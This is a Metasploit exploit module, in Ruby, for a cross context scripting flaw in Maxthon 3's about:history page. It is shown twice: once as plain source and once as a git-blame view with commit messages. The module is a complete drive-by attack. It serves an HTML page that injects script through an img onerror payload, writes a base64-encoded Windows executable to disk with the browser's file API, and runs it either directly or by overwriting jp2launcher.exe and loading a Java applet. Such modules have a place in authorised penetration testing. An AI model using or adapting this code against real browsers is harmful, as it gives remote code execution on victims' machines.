metasploit-framework/modules/exploits/windows/browser/maxthon_history_xcs.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##


require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name' => 'Maxthon3 about:history XCS',
			'Description' => %q{
				Cross Context Scripting (XCS) is possible in the Maxthon about:history page.
				Injection in such privileged/trusted browser zone can be used to modify
				configuration settings and execute arbitrary commands.
			},
			'License' => BSD_LICENSE,
			'Author' =>
				[ 
					'Roberto Suggi Liverani', # Discovered the vulnerability and developed msf module
				],
			'References' =>
				[
						['URL', 'http://blog.malerisch.net/2012/12/maxthon-cross-context-scripting-xcs-about-history-rce.html'],
				],
			'Payload' =>
				{
				'DisableNops' => true,
				},
			'Platform'       => 'win',
			'Targets' =>
				[
					['Maxthon 3 on Windows', {} ]
				],
			'DisclosureDate' => 'Nov 26 2012',
			'DefaultTarget' => 0
		))

		register_options(
			[
				OptString.new('JPATH', [true, "Java executable path to overwrite", 'C:\\\\Program\\ Files\\\\Java\\\\jre7\\\\bin\\\\jp2launcher.exe']),
				OptString.new('JAVAURL', [true, "Java Applet URL", 'http://profs.etsmtl.ca/mmcguffin/learn/java/01-drawingLines/']),
			], self.class

		)
	end

	def on_request_uri(cli, request)

		jpath = datastore['JPATH']
		javaurl = datastore['JAVAURL']

		headers = {}
		html_hdr = %Q^
			<html>
			<head>
			<title>Loading</title>
			^
		html_ftr = %Q^
			</head>
			<body >
			<h1>Loading</h1>
			</body></html>
			^

		case request.uri
			when /\?jspayload/
				p = regenerate_payload(cli)
				if (p.nil?)
					send_not_found(cli)
					return
				end
				# We're going to run this through unescape(), so make sure
				# everything is encoded
				penc = Msf::Util::EXE.to_win32pe(framework, p.encoded)
				penc2 = Rex::Text.encode_base64(penc)

				# now this is base64 encoded payload which needs to be passed to the file write api in maxthon
				# depending on maxthon version, then file can be launched via Program DOM API
				# or replacing Java program
				# here we need to take a dirty approach, we need to overwrite an existing exe and then invoke it
				# this is because the maxthon.program object has been silently removed in latest Maxthon versions...
				# in WindowsXP, any exe can be overwritten, then a simple call to a uri scheme can invoke the exe
				# e.g. wab.exe invoked via mailto://
				# however, in win7, a prompt will be displayed if browser executes a mail client or an external program
				# so a common way to exploit would be to overwrite the j2plauncher.exe, which calls java.exe when applet is found
				# once that is done, then we can point to a page where a java applet exists which will invoke java.exe,
				# unless previously loaded by the user
				content =
						%Q{
					var fileTemp = new maxthon.io.File.createTempFile("test","exe");
					var fileObj = maxthon.io.File(fileTemp);
					maxthon.io.FileWriter(fileTemp);

					if(maxthon.program)
					{
					maxthon.io.writeDataURL("data:application/x-msdownload;base64,#{penc2}");
					maxthon.program.Program.launch(fileTemp.name_,"C:");
					}

					else
					{
					fileTemp.name_ = "#{jpath}";
					maxthon.io.writeDataURL("data:application/x-msdownload;base64,#{penc2}");

					a=document.createElement("iframe");
					a.setAttribute("src","#{javaurl}");
					document.body.appendChild(a)

					}

				}

			when /\?history/
				js = %Q|
				window.onload = function() {
					location.href = "about:history";
				}
				|

				content = %Q|
				#{html_hdr}
				<script>
				#{js}
				</script>
				#{html_ftr}
				|
			when get_resource()
				print_status("Sending #{self.name} payload for request #{request.uri}")

				js = %Q|

				url = location.href;
				url2 = url + "?jspayload=1";
				inj = "?history#%22/><img src=a onerror=%22"
				inj_1 = "a=document.createElement('script');a.setAttribute('src','"+url2+"');document.body.appendChild(a);";
				window.location = unescape(inj) + inj_1;
				|

				content = %Q|
				#{html_hdr}
				<script>
				#{js}
				</script>
				#{html_ftr}
				|
			else
				print_status("Sending 404 for request #{request.uri}")
				send_not_found(cli)
				return
		end

		send_response_html(cli, content, headers)
		handler(cli)
	end

end
First changes 2012-12-07 17:27:09 +00:00			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
			`# http://metasploit.com/framework/`
			`##`


Added Maxthon3 Cross Context Scripting (XCS) exploits for Win 2012-11-24 23:53:58 +00:00			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Remote`
			`Rank = ExcellentRanking`

			`include Msf::Exploit::Remote::HttpServer::HTML`

			`def initialize(info = {})`
			`super(update_info(info,`
First changes 2012-12-07 17:27:09 +00:00			`'Name' => 'Maxthon3 about:history XCS',`
Added Maxthon3 Cross Context Scripting (XCS) exploits for Win 2012-11-24 23:53:58 +00:00			`'Description' => %q{`
			`Cross Context Scripting (XCS) is possible in the Maxthon about:history page.`
First changes 2012-12-07 17:27:09 +00:00			`Injection in such privileged/trusted browser zone can be used to modify`
			`configuration settings and execute arbitrary commands.`
Added Maxthon3 Cross Context Scripting (XCS) exploits for Win 2012-11-24 23:53:58 +00:00			`},`
			`'License' => BSD_LICENSE,`
			`'Author' =>`
First changes 2012-12-07 17:27:09 +00:00			`[`
			`'Roberto Suggi Liverani', # Discovered the vulnerability and developed msf module`
			`],`
Added Maxthon3 Cross Context Scripting (XCS) exploits for Win 2012-11-24 23:53:58 +00:00			`'References' =>`
			`[`
Advisories URLs changed 2012-12-05 22:33:25 +00:00			`['URL', 'http://blog.malerisch.net/2012/12/maxthon-cross-context-scripting-xcs-about-history-rce.html'],`
Added Maxthon3 Cross Context Scripting (XCS) exploits for Win 2012-11-24 23:53:58 +00:00			`],`
			`'Payload' =>`
			`{`
			`'DisableNops' => true,`
			`},`
First changes 2012-12-07 17:27:09 +00:00			`'Platform' => 'win',`
Added Maxthon3 Cross Context Scripting (XCS) exploits for Win 2012-11-24 23:53:58 +00:00			`'Targets' =>`
			`[`
First changes 2012-12-07 17:27:09 +00:00			`['Maxthon 3 on Windows', {} ]`
Added Maxthon3 Cross Context Scripting (XCS) exploits for Win 2012-11-24 23:53:58 +00:00			`],`
			`'DisclosureDate' => 'Nov 26 2012',`
			`'DefaultTarget' => 0`
			`))`

			`register_options(`
			`[`
			`OptString.new('JPATH', [true, "Java executable path to overwrite", 'C:\\\\Program\\ Files\\\\Java\\\\jre7\\\\bin\\\\jp2launcher.exe']),`
			`OptString.new('JAVAURL', [true, "Java Applet URL", 'http://profs.etsmtl.ca/mmcguffin/learn/java/01-drawingLines/']),`
			`], self.class`

			`)`
			`end`

			`def on_request_uri(cli, request)`

			`jpath = datastore['JPATH']`
			`javaurl = datastore['JAVAURL']`

			`headers = {}`
			`html_hdr = %Q^`
			`<html>`
			`<head>`
			`<title>Loading</title>`
			`^`
			`html_ftr = %Q^`
			`</head>`
			`<body >`
			`<h1>Loading</h1>`
			`</body></html>`
			`^`

			`case request.uri`
First changes 2012-12-07 17:27:09 +00:00			`when /\?jspayload/`
Added Maxthon3 Cross Context Scripting (XCS) exploits for Win 2012-11-24 23:53:58 +00:00			`p = regenerate_payload(cli)`
			`if (p.nil?)`
			`send_not_found(cli)`
			`return`
			`end`
			`# We're going to run this through unescape(), so make sure`
			`# everything is encoded`
			`penc = Msf::Util::EXE.to_win32pe(framework, p.encoded)`
			`penc2 = Rex::Text.encode_base64(penc)`
First changes 2012-12-07 17:27:09 +00:00
Added Maxthon3 Cross Context Scripting (XCS) exploits for Win 2012-11-24 23:53:58 +00:00			`# now this is base64 encoded payload which needs to be passed to the file write api in maxthon`
			`# depending on maxthon version, then file can be launched via Program DOM API`
			`# or replacing Java program`
First changes 2012-12-07 17:27:09 +00:00			`# here we need to take a dirty approach, we need to overwrite an existing exe and then invoke it`
			`# this is because the maxthon.program object has been silently removed in latest Maxthon versions...`
			`# in WindowsXP, any exe can be overwritten, then a simple call to a uri scheme can invoke the exe`
			`# e.g. wab.exe invoked via mailto://`
			`# however, in win7, a prompt will be displayed if browser executes a mail client or an external program`
			`# so a common way to exploit would be to overwrite the j2plauncher.exe, which calls java.exe when applet is found`
			`# once that is done, then we can point to a page where a java applet exists which will invoke java.exe,`
			`# unless previously loaded by the user`
Added Maxthon3 Cross Context Scripting (XCS) exploits for Win 2012-11-24 23:53:58 +00:00			`content =`
			`%Q{`
			`var fileTemp = new maxthon.io.File.createTempFile("test","exe");`
			`var fileObj = maxthon.io.File(fileTemp);`
			`maxthon.io.FileWriter(fileTemp);`

			`if(maxthon.program)`
			`{`
			`maxthon.io.writeDataURL("data:application/x-msdownload;base64,#{penc2}");`
			`maxthon.program.Program.launch(fileTemp.name_,"C:");`
			`}`

			`else`
			`{`
			`fileTemp.name_ = "#{jpath}";`
			`maxthon.io.writeDataURL("data:application/x-msdownload;base64,#{penc2}");`

			`a=document.createElement("iframe");`
			`a.setAttribute("src","#{javaurl}");`
			`document.body.appendChild(a)`

			`}`

			`}`

First changes 2012-12-07 17:27:09 +00:00			`when /\?history/`
			`js = %Q\|`
Added Maxthon3 Cross Context Scripting (XCS) exploits for Win 2012-11-24 23:53:58 +00:00			`window.onload = function() {`
			`location.href = "about:history";`
			`}`
First changes 2012-12-07 17:27:09 +00:00			`\|`

			`content = %Q\|`
Added Maxthon3 Cross Context Scripting (XCS) exploits for Win 2012-11-24 23:53:58 +00:00			`#{html_hdr}`
			`<script>`
			`#{js}`
			`</script>`
			`#{html_ftr}`
First changes 2012-12-07 17:27:09 +00:00			`\|`
Added Maxthon3 Cross Context Scripting (XCS) exploits for Win 2012-11-24 23:53:58 +00:00			`when get_resource()`
			`print_status("Sending #{self.name} payload for request #{request.uri}")`

First changes 2012-12-07 17:27:09 +00:00			`js = %Q\|`
Added Maxthon3 Cross Context Scripting (XCS) exploits for Win 2012-11-24 23:53:58 +00:00
			`url = location.href;`
			`url2 = url + "?jspayload=1";`
			`inj = "?history#%22/><img src=a onerror=%22"`
			`inj_1 = "a=document.createElement('script');a.setAttribute('src','"+url2+"');document.body.appendChild(a);";`
			`window.location = unescape(inj) + inj_1;`
First changes 2012-12-07 17:27:09 +00:00			`\|`
Added Maxthon3 Cross Context Scripting (XCS) exploits for Win 2012-11-24 23:53:58 +00:00
First changes 2012-12-07 17:27:09 +00:00			`content = %Q\|`
Added Maxthon3 Cross Context Scripting (XCS) exploits for Win 2012-11-24 23:53:58 +00:00			`#{html_hdr}`
			`<script>`
			`#{js}`
			`</script>`
			`#{html_ftr}`
First changes 2012-12-07 17:27:09 +00:00			`\|`
Added Maxthon3 Cross Context Scripting (XCS) exploits for Win 2012-11-24 23:53:58 +00:00			`else`
			`print_status("Sending 404 for request #{request.uri}")`
			`send_not_found(cli)`
			`return`
			`end`

			`send_response_html(cli, content, headers)`
			`handler(cli)`
			`end`

			`end`